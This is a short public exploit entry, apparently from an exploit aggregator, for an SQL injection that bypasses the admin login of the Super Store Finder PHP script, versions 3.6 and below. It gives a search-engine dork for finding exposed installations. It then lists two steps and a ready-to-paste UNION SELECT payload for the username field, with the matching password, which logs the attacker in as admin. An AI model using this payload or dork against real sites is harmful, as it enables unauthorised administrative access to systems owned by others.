Share
## https://sploitus.com/exploit?id=PACKETSTORM:173302
#Title : Super Store Finder PHP Script SQL Injection / Bypass admin login  
#Researcher : Etharus  
#Vendor : Joe Iz, https://superstorefinder.net/  
#Script Demo Url : https://superstorefinder.net/products/superstorefinder/  
#Version Affected : 3.6 and below  
#Date : 5 July 2023  
#FOFA Dork : "designed and built by Joe Iz."  
# Step 1 : Go to admin login, eg: http://localhost/store-finder/admin/  
# Step 2 : Enter following payload  
  
username : ' union select 1,'admin','32ddaaea6874e2d3eab0a9ea6ecbb0d0',4,5,6,7,8,9,10,11-- -  
password : admin